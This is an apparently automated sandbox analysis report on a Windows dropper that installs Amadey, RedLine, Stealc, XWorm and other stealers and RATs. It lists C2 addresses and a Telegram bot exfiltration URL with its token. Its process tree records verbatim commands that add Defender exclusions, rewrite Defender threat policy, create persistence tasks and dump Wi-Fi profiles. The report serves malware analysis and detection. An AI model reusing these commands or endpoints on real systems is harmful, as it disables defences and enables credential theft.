Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-04-2024 08:28

General

  • Target

    58adc4e07559ed969124b3f3537b0229868e859cb1a0990323eeb11b3c0679b2.exe

  • Size

    1.8MB

  • MD5

    923c53f17b938b35c2cf133096c92cbd

  • SHA1

    a23f742a606a7452791be367f5a403841c33a6ea

  • SHA256

    58adc4e07559ed969124b3f3537b0229868e859cb1a0990323eeb11b3c0679b2

  • SHA512

    221a27dcbd1728942a9de4e159e6a7493f3f1eb749b6b96ddd2f15654f9bbd6e08a32dff92ec8450afcf0a7b6c4a4c845f2d9bf8ad63a8ae3eac4b4b3d9b818d

  • SSDEEP

    49152:Ml4YdGCGA0dAJ53+ENHbexvKr8Zt1ZNX5Ti:4t1zJ53/HCxvvZH/XZ

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:7000

91.92.252.220:7000

41.199.23.195:7000

saveclinetsforme68465454711991.publicvm.com:7000

Mutex

bBT8anvIxhxDFmkf

Attributes
  • Install_directory

    %AppData%

  • install_file

    explorer.exe

  • telegram

    https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

aes.plain

Extracted

Family

redline

Botnet

cheat

C2

saveclinetsforme68465454711991.publicvm.com:1111

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Xworm Payload 2 IoCs
  • Detect ZGRat V1 3 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 7 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 13 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 35 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\58adc4e07559ed969124b3f3537b0229868e859cb1a0990323eeb11b3c0679b2.exe
    "C:\Users\Admin\AppData\Local\Temp\58adc4e07559ed969124b3f3537b0229868e859cb1a0990323eeb11b3c0679b2.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    PID:4468
  • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
      "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4968
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:1836
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
            PID:4676
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 888
            3⤵
            • Program crash
            PID:3036
        • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
          "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4880
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
              PID:3308
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3160
              • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:880
              • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                4⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1916
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                4⤵
                  PID:4556
                  • C:\Windows\SysWOW64\choice.exe
                    choice /C Y /N /D Y /T 3
                    5⤵
                      PID:3856
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 384
                  3⤵
                  • Program crash
                  PID:3460
              • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
                "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2280
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  3⤵
                    PID:4016
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 400
                    3⤵
                    • Program crash
                    PID:4440
                • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3164
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
                    3⤵
                    • Creates scheduled task(s)
                    PID:1424
                • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4520
                • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:4840
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    3⤵
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1496
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                  2⤵
                  • Loads dropped DLL
                  PID:328
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                    3⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2944
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profiles
                      4⤵
                        PID:1284
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\994005945408_Desktop.zip' -CompressionLevel Optimal
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1836
                  • C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"
                    2⤵
                    • UAC bypass
                    • Windows security bypass
                    • Executes dropped EXE
                    • Windows security modification
                    • Checks whether UAC is enabled
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    • System policy modification
                    PID:776
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe" -Force
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3564
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2272
                      • C:\Users\Admin\Pictures\dVtqx6Ft12RDWKN7bNbZ9ZVC.exe
                        "C:\Users\Admin\Pictures\dVtqx6Ft12RDWKN7bNbZ9ZVC.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:1312
                      • C:\Users\Admin\Pictures\1YtigXAOap8yGxU8InjzBKDH.exe
                        "C:\Users\Admin\Pictures\1YtigXAOap8yGxU8InjzBKDH.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:4680
                      • C:\Users\Admin\Pictures\H8JPZugAJhhjd9zQiZyTdcER.exe
                        "C:\Users\Admin\Pictures\H8JPZugAJhhjd9zQiZyTdcER.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:3412
                      • C:\Users\Admin\Pictures\HNNuiFb24lSMhWgn6DNla9SG.exe
                        "C:\Users\Admin\Pictures\HNNuiFb24lSMhWgn6DNla9SG.exe" --silent --allusers=0
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Modifies system certificate store
                        PID:2840
                        • C:\Users\Admin\Pictures\HNNuiFb24lSMhWgn6DNla9SG.exe
                          C:\Users\Admin\Pictures\HNNuiFb24lSMhWgn6DNla9SG.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6e38e1d0,0x6e38e1dc,0x6e38e1e8
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3276
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\HNNuiFb24lSMhWgn6DNla9SG.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\HNNuiFb24lSMhWgn6DNla9SG.exe" --version
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:4048
                        • C:\Users\Admin\Pictures\HNNuiFb24lSMhWgn6DNla9SG.exe
                          "C:\Users\Admin\Pictures\HNNuiFb24lSMhWgn6DNla9SG.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2840 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240429082927" --session-guid=8e88e509-31a9-461a-81f2-f552670ada88 --server-tracking-blob="ZjEwYzBjM2JiZmRjZTA2MWYyZTI4NTI4MzU1NDQ4MmJmOWY5MDBkNzczZjUwYWNmNTdiMmFlZTk1ZThlYmRhZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0Mzc5MzY1LjA3MjgiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiM2I0MGIxZDUtYjMyNy00ZWFlLWFiY2ItZmJmNzgwY2ExODg2In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7004000000000000
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates connected drives
                          PID:4288
                          • C:\Users\Admin\Pictures\HNNuiFb24lSMhWgn6DNla9SG.exe
                            C:\Users\Admin\Pictures\HNNuiFb24lSMhWgn6DNla9SG.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6da0e1d0,0x6da0e1dc,0x6da0e1e8
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:1324
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404290829271\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404290829271\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:3752
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404290829271\assistant\assistant_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404290829271\assistant\assistant_installer.exe" --version
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:844
                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404290829271\assistant\assistant_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404290829271\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xce6038,0xce6044,0xce6050
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:4164
                      • C:\Users\Admin\Pictures\6ZLllmZndgE46V8pOANahdwJ.exe
                        "C:\Users\Admin\Pictures\6ZLllmZndgE46V8pOANahdwJ.exe"
                        4⤵
                        • Modifies firewall policy service
                        • Windows security bypass
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Windows security modification
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3764
                      • C:\Users\Admin\Pictures\c5sAUR76q7E7AGkwMzc8MfTL.exe
                        "C:\Users\Admin\Pictures\c5sAUR76q7E7AGkwMzc8MfTL.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:3572
                        • C:\Users\Admin\AppData\Local\Temp\7zSC704.tmp\Install.exe
                          .\Install.exe /WkfdidVYT "385118" /S
                          5⤵
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Enumerates system info in registry
                          PID:2264
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            6⤵
                              PID:1852
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                7⤵
                                  PID:2860
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    8⤵
                                      PID:3440
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                        9⤵
                                          PID:4780
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                      7⤵
                                        PID:1772
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                          8⤵
                                            PID:5092
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                              9⤵
                                                PID:440
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                            7⤵
                                              PID:1124
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                8⤵
                                                  PID:1916
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    9⤵
                                                      PID:3644
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                  7⤵
                                                    PID:1128
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      8⤵
                                                        PID:3116
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                          9⤵
                                                            PID:3760
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                        7⤵
                                                          PID:2464
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                            8⤵
                                                              PID:1332
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                9⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4000
                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                  10⤵
                                                                    PID:2328
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                            6⤵
                                                              PID:4144
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                7⤵
                                                                  PID:3052
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                    8⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3140
                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                      9⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4772
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 08:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSC704.tmp\Install.exe\" Wt /KYDdidXSvU 385118 /S" /V1 /F
                                                                6⤵
                                                                • Drops file in Windows directory
                                                                • Creates scheduled task(s)
                                                                PID:5092
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
                                                                6⤵
                                                                  PID:1916
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                                    7⤵
                                                                      PID:3852
                                                                      • \??\c:\windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                                        8⤵
                                                                          PID:5012
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                3⤵
                                                                  PID:2332
                                                              • C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:784
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'
                                                                  3⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1812
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
                                                                  3⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4344
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
                                                                  3⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
